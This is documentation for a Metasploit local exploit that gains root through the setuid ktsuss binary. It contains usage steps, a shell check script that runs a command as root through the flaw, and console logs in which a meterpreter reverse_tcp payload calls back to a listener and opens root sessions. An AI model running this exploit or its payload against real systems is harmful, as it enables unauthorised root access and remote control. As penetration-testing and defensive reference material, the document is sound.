metasploit-gs/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md
2019-08-19 13:34:52 +00:00
## Description

This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior.

The `ktsuss` executable is installed setuid `root` and does not drop privileges before executing the user-specified command, so any local user who can run it obtains command execution with `root` privileges.

## Vulnerable Application
This module has been tested successfully on:
* ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)
* ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/ktsuss_suid_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options

**KTSUSS_PATH**

Path to `ktsuss` executable (default: `/usr/bin/ktsuss`)

**WritableDir**

A writable directory file system path. (default: `/tmp`)

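The check the module performs can be reproduced from a plain shell on the target, which is useful when verifying a host without a Metasploit session. The script below is an added example and is not the module's own code. It assumes the binary lives at the `KTSUSS_PATH` default above and that `ktsuss` accepts the command to run as its trailing argument (the module's output shows `id` being executed through it); adjust that invocation to your build if it differs. The `id` parsing handles the fact that `id(1)` prints `euid=` only when it differs from `uid=`.

```sh
#!/bin/sh
# Added example (not the Metasploit module's code): reproduce the module's
# check from a plain shell on the target, for verification outside msfconsole.
#   1. Is KTSUSS_PATH a regular file owned by root with the setuid bit set?
#   2. Does a command run through ktsuss report an effective uid of 0?
# Assumption: ktsuss accepts the command to run as its trailing argument
# (the module's output shows `id` executed through it); adjust to your build.

KTSUSS_PATH="${KTSUSS_PATH:-/usr/bin/ktsuss}"

# is_setuid_root PATH: exit 0 when PATH is a regular file owned by root whose
# mode includes the setuid bit (4000). find(1) with -prune applies the tests
# to the named file itself without descending into anything.
is_setuid_root() {
    [ -f "$1" ] || return 1
    [ -n "$(find "$1" -prune -user root -perm -4000 -print 2>/dev/null)" ]
}

# effective_uid_from_id "ID_OUTPUT": print the effective uid encoded in id(1)
# output. id(1) prints euid= only when it differs from uid=, so fall back to
# the leading uid= field when no euid= is present.
effective_uid_from_id() {
    euid=$(printf '%s\n' "$1" | sed -n 's/.*euid=\([0-9][0-9]*\).*/\1/p')
    if [ -n "$euid" ]; then
        printf '%s\n' "$euid"
    else
        printf '%s\n' "$1" | sed -n 's/^uid=\([0-9][0-9]*\).*/\1/p'
    fi
}

# runs_as_root "ID_OUTPUT": exit 0 when the effective uid is 0.
runs_as_root() {
    [ "$(effective_uid_from_id "$1")" = "0" ]
}

# list_setuid_root DIR: defensive sweep; print every setuid-root regular file
# under DIR on the same filesystem (ktsuss would show up here if installed).
list_setuid_root() {
    find "$1" -xdev -type f -user root -perm -4000 -print 2>/dev/null
}

# check_ktsuss: mirror of the module's `check`; exit 0 when the target looks
# vulnerable (setuid root binary that runs the given command with euid 0).
check_ktsuss() {
    if ! is_setuid_root "$KTSUSS_PATH"; then
        echo "[-] $KTSUSS_PATH is not setuid root"
        return 1
    fi
    echo "[+] $KTSUSS_PATH is setuid root"
    # Assumed invocation: command passed as trailing argument.
    out=$("$KTSUSS_PATH" id 2>/dev/null) || out=""
    if [ -n "$out" ] && runs_as_root "$out"; then
        echo "[*] $out"
        echo "[+] The target is vulnerable."
        return 0
    fi
    echo "[-] ktsuss did not execute the command with euid 0 (or could not be run)"
    return 1
}

# Run the check only when asked, so the file can also be sourced for its functions.
if [ "${1:-}" = "check" ]; then
    check_ktsuss
fi
```

Run it as `sh check_ktsuss.sh check` on the target; the output mirrors the `[+] ... is setuid` / `[+] The target is vulnerable.` lines from the module. `list_setuid_root /usr` is the defender's side of the same check: it enumerates setuid-root binaries so an affected `ktsuss` can be found and upgraded (or stripped of its setuid bit with `chmod u-s` where the tool is not needed).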
## Scenarios
### ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)
```
msf5 > use exploit/linux/local/ktsuss_suid_priv_esc
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
[*] Writing '/tmp/.lBanpIYpAJ60cwt' (389 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.137:53060) at 2019-08-19 09:18:29 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.137
OS : Sparky 5.8 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)
```
msf5 > use exploit/linux/local/ktsuss_suid_priv_esc
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
[*] Writing '/tmp/.R0aTPpB8aHk' (389 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.167
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.167:44534) at 2019-08-19 09:25:48 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.167
OS : Sparky 6 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```